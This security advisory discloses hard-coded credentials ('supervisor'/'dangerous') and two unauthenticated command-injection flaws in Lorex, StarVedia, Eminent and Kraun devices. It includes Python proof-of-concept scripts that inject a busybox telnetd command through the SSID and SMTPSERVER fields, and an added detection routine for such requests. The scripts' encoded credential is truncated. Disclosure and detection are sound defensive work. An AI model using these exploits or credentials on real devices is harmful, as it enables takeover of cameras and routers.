### Vulnerabilities summary
The following advisory describes three (3) vulnerabilities found in products from the following vendors:
* Lorex
* StarVedia
* Eminent
* Kraun
The vulnerabilities found:
* Hard-coded credentials
* Remote command injection (2)
It is possible to chain the vulnerabilities to achieve unauthenticated remote command execution.
### Credit
An independent security researcher, Robert Kugler (https://www.s3cur3.it), has reported these vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
### Vendor response
We tried to contact Lorex, Kraun and Eminent. Our attempts to establish contact went unanswered, so no details have been provided on a solution or a workaround.
StarVedia was informed of the vulnerabilities and released patches to address them: “These two issues were fixed before your contacting us”.
### Vulnerabilities details
#### Hard-coded credentials
A default user can be used to log in to the router’s web interface: “supervisor”, with the password “dangerous”.
#### Remote command injection (1)
User-controlled input is not sufficiently filtered, which allows an attacker to inject arbitrary commands by sending a POST request to wlanset.cgi with a malicious ‘SSID’ parameter.
#### Proof of Concept
```
#!/usr/bin/python
import requests
import os
import time
print "Unauthenticated Remote Code Execution"
url = 'http://VICTIM-IP/cgi-bin/wlanset.cgi' # Adjust IP address
payload = {'WiFiEnable': '1','SSID':'`/bin/busybox telnetd`','SECUNONE':'1','WIFITEST':'WiFi+test'}
headers = { "Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==", "Content-type": "application/x-www-form-urlencoded"}
r = requests.post(url, data=payload, headers=headers)
time.sleep(5)
print "\nTry to connect to your target via telnet and use the user name root."
```
#### Remote command injection (2)
User-controlled input is not sufficiently filtered, which allows an attacker to inject arbitrary commands by sending a POST request to smtpset.cgi with a malicious ‘SMTPSERVER’ parameter.
#### Proof of Concept
```
#!/usr/bin/python
import requests
import os
import time
print "Unauthenticated Remote Code Execution"
url = 'http://VICTIM-IP/cgi-bin/smtpset.cgi' # Adjust IP address
payload = {'UseUserDefined': '1','SMTPSERVER':'`/bin/busybox telnetd`','SMTPPORT':'25','SMTPNAME':'','SMTPPASSWD':'','SMTPTEST':'SMTP+server+test'}
headers = { "Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==", "Content-type": "application/x-www-form-urlencoded"}
r = requests.post(url, data=payload, headers=headers)
time.sleep(5)
print "\nTry to connect to your target via telnet and use the user name root."
```
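#### Detection example

The following detection logic is an added example, not part of the original advisory or of any vendor's code. It inspects captured HTTP requests for the two injection points and the hard-coded account described above. It assumes requests are available as method, URL, headers and body (for example from a reverse proxy or IDS); the function names and the `SHELL_META` list are assumptions of this example.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Endpoint -> form field the advisory names as the injection point.
WATCHED = {"/cgi-bin/wlanset.cgi": "SSID", "/cgi-bin/smtpset.cgi": "SMTPSERVER"}
# Sequences a shell interprets as command syntax (assumed list, tune as needed).
SHELL_META = ("`", "$(", ";", "|", "&", "<", ">", "\n", "\r")
DEFAULT_USER = "supervisor"  # hard-coded account named in the advisory


def basic_auth_user(headers):
    """Return the user name from a Basic Authorization header, or None."""
    lowered = {k.lower(): v for k, v in headers.items()}
    scheme, _, blob = lowered.get("authorization", "").partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        # Re-pad first: unpadded or truncated blobs still reveal the user name.
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    except ValueError:
        return None
    return raw.decode("utf-8", "replace").split(":", 1)[0]


def inspect_request(method, url, headers, body):
    """Return findings for one captured request (method, URL, headers, body)."""
    findings = []
    if basic_auth_user(headers) == DEFAULT_USER:
        findings.append("default-account")
    field = WATCHED.get(urlsplit(url).path)
    if method.upper() == "POST" and field is not None:
        # parse_qs percent-decodes, so %60 and a literal backtick look the same.
        for value in parse_qs(body, keep_blank_values=True).get(field, []):
            if any(meta in value for meta in SHELL_META):
                findings.append("shell-meta:" + field)
                break
    return findings


if __name__ == "__main__":
    # Constructed sample requests (192.0.2.0/24 is a documentation range).
    cred = "Basic " + base64.b64encode(b"supervisor:example").decode()
    samples = [
        ("POST", "http://192.0.2.10/cgi-bin/wlanset.cgi", {"Authorization": cred},
         "WiFiEnable=1&SSID=%60id%60&SECUNONE=1"),
        ("POST", "http://192.0.2.10/cgi-bin/wlanset.cgi", {}, "WiFiEnable=1&SSID=HomeNet"),
    ]
    for sample in samples:
        print(sample[1], inspect_request(*sample))
```

Legitimate SSIDs can contain characters such as `&`, so treat a `shell-meta` finding as a lead to review rather than a confirmed injection.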